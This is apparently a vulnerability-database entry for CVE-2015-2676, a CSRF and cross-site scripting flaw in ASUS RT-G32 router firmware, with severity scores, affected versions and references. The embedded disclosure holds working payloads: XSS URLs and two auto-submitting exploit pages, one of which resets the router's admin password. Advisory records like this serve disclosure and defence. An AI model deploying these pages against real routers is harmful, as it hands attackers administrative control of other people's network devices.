Sign-up

ID

VAR-201503-0298


CVE

CVE-2015-2676


TITLE

Asus RT-G32 Cross-site request forgery vulnerability in router firmware

Trust: 0.8

sources: JVNDB: JVNDB-2015-001913

DESCRIPTION

Cross-site request forgery (CSRF) vulnerability in the ASUS RT-G32 routers with firmware 2.0.2.6 and 2.0.3.2 allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via a request to start_apply.htm. ASUS RT-G32 routers is a router device. Asus RT-G32 is prone to a cross-site request-forgery vulnerability. An attacker can exploit this issue to perform certain unauthorized actions and gain access to the affected device. Other attacks are also possible. ------------------------- Affected products: ------------------------- Vulnerable is the next model: ASUS RT-G32 with different versions of firmware. I checked in ASUS RT-G32 with firmware versions 2.0.2.6 and 2.0.3.2. ---------- Details: ---------- Cross-Site Scripting (WASC-08): http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27 http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27 http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27 http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27 These vulnerabilities work as via GET, as via POST (work even without authorization). ASUS RT-G32 XSS-1.html <html> <head> <title>ASUS RT-G32 XSS exploit (C) 2015 MustLive</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/start_apply.htm" method="post"> <input type="hidden" name="next_page" value="'+alert(document.cookie)+'"> <input type="hidden" name="group_id" value="'+alert(document.cookie)+'"> <input type="hidden" name="action_script" value="'+alert(document.cookie)+'"> <input type="hidden" name="flag" value="'+alert(document.cookie)+'"> </form> </body> </html> Cross-Site Request Forgery (WASC-09): CSRF vulnerability allows to change different settings, including admin's password. As I showed in this exploit (post-auth). ASUS RT-G32 CSRF-1.html <html> <head> <title>ASUS RT-G32 CSRF exploit (C) 2015 MustLive</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/start_apply.htm" method="post"> <input type="hidden" name="http_passwd" value="admin"> <input type="hidden" name="http_passwd2" value="admin"> <input type="hidden" name="v_password2" value="admin"> <input type="hidden" name="action_mode" value="+Apply+"> </form> </body> </html> I found this and other routers since summer to take control over terrorists in Crimea, Donetsk & Lugansks regions of Ukraine. Read about it in the list (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-February/009077.html) and in many my interviews (http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html). I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/7644/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua

Trust: 2.61

sources: NVD: CVE-2015-2676 // JVNDB: JVNDB-2015-001913 // CNVD: CNVD-2015-01969 // BID: 73294 // VULHUB: VHN-80637 // PACKETSTORM: 130724

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2015-01969

AFFECTED PRODUCTS

vendor:asusmodel:rt-g32scope:eqversion:2.0.2.6

Trust: 2.5

vendor:asusmodel:rt-g32scope:eqversion:2.0.3.2

Trust: 2.5

vendor:asustek computermodel:rt-g32scope: - version: -

Trust: 0.8

vendor:asustek computermodel:rt-g32scope:eqversion:2.0.2.6

Trust: 0.8

vendor:asustek computermodel:rt-g32scope:eqversion:2.0.3.2

Trust: 0.8

sources: CNVD: CNVD-2015-01969 // BID: 73294 // JVNDB: JVNDB-2015-001913 // CNNVD: CNNVD-201503-421 // NVD: CVE-2015-2676

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2015-2676
value: MEDIUM

Trust: 1.0

NVD: CVE-2015-2676
value: MEDIUM

Trust: 0.8

CNVD: CNVD-2015-01969
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201503-421
value: MEDIUM

Trust: 0.6

VULHUB: VHN-80637
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2015-2676
severity: MEDIUM
baseScore: 6.8
vectorString: AV:N/AC:M/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.6
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2015-01969
severity: MEDIUM
baseScore: 6.8
vectorString: AV:N/AC:M/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.6
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-80637
severity: MEDIUM
baseScore: 6.8
vectorString: AV:N/AC:M/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.6
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: CNVD: CNVD-2015-01969 // VULHUB: VHN-80637 // JVNDB: JVNDB-2015-001913 // CNNVD: CNNVD-201503-421 // NVD: CVE-2015-2676

PROBLEMTYPE DATA

problemtype:CWE-352

Trust: 1.9

sources: VULHUB: VHN-80637 // JVNDB: JVNDB-2015-001913 // NVD: CVE-2015-2676

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201503-421

TYPE

cross-site request forgery

Trust: 0.6

sources: CNNVD: CNNVD-201503-421

CONFIGURATIONS

sources:
            
            
            JVNDB: JVNDB-2015-001913

PATCH
title:RT-G32url:http://www.asus.com/Networking/RTG32/
Trust: 0.8
sources:
            
            
            JVNDB: JVNDB-2015-001913

EXTERNAL IDS
db:NVDid:CVE-2015-2676
Trust: 3.4
db:PACKETSTORMid:130724
Trust: 2.6
db:BIDid:73294
Trust: 1.4
db:JVNDBid:JVNDB-2015-001913
Trust: 0.8
db:CNNVDid:CNNVD-201503-421
Trust: 0.7
db:CNVDid:CNVD-2015-01969
Trust: 0.6
db:VULHUBid:VHN-80637
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2015-01969 // 
            
            
            
            VULHUB: VHN-80637 // 
            
            
            
            BID: 73294 // 
            
            
            
            JVNDB: JVNDB-2015-001913 // 
            
            
            
            PACKETSTORM: 130724 // 
            
            
            
            CNNVD: CNNVD-201503-421 // 
            
            
            
            NVD: CVE-2015-2676

REFERENCES
url:http://packetstormsecurity.com/files/130724/asus-rt-g32-cross-site-request-forgery-cross-site-scripting.html
Trust: 2.5
url:http://websecurity.com.ua/7644/
Trust: 2.5
url:http://seclists.org/fulldisclosure/2015/mar/42
Trust: 2.0
url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2676
Trust: 1.4
url:http://www.securityfocus.com/bid/73294
Trust: 1.1
url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2676
Trust: 0.8
url:http://www.asus.com/
Trust: 0.3
url:http://www.asus.com/networking/rtg32/
Trust: 0.3
url:http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-february/009077.html)
Trust: 0.1
url:http://websecurity.com.ua
Trust: 0.1
url:http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27
Trust: 0.1
url:http://websecurity.com.ua/7644/).
Trust: 0.1
url:http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27
Trust: 0.1
url:http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html).
Trust: 0.1
url:http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27
Trust: 0.1
url:http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27
Trust: 0.1
url:http://site/start_apply.htm"
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2015-01969 // 
            
            
            
            VULHUB: VHN-80637 // 
            
            
            
            BID: 73294 // 
            
            
            
            JVNDB: JVNDB-2015-001913 // 
            
            
            
            PACKETSTORM: 130724 // 
            
            
            
            CNNVD: CNNVD-201503-421 // 
            
            
            
            NVD: CVE-2015-2676

CREDITS
MustLive
Trust: 0.4
sources:
            
            
            BID: 73294 // 
            
            
            
            PACKETSTORM: 130724

SOURCES
db:CNVDid:CNVD-2015-01969
db:VULHUBid:VHN-80637
db:BIDid:73294
db:JVNDBid:JVNDB-2015-001913
db:PACKETSTORMid:130724
db:CNNVDid:CNNVD-201503-421
db:NVDid:CVE-2015-2676

LAST UPDATE DATE
2024-11-23T21:44:25.789000+00:00

SOURCES UPDATE DATE
db:CNVDid:CNVD-2015-01969date:2015-03-25T00:00:00
db:VULHUBid:VHN-80637date:2016-12-03T00:00:00
db:BIDid:73294date:2015-03-24T00:00:00
db:JVNDBid:JVNDB-2015-001913date:2015-03-25T00:00:00
db:CNNVDid:CNNVD-201503-421date:2015-03-24T00:00:00
db:NVDid:CVE-2015-2676date:2024-11-21T02:27:49.793

SOURCES RELEASE DATE
db:CNVDid:CNVD-2015-01969date:2015-03-25T00:00:00
db:VULHUBid:VHN-80637date:2015-03-23T00:00:00
db:BIDid:73294date:2015-03-24T00:00:00
db:JVNDBid:JVNDB-2015-001913date:2015-03-25T00:00:00
db:PACKETSTORMid:130724date:2015-03-07T11:11:11
db:CNNVDid:CNNVD-201503-421date:2015-03-24T00:00:00
db:NVDid:CVE-2015-2676date:2015-03-23T16:59:03.617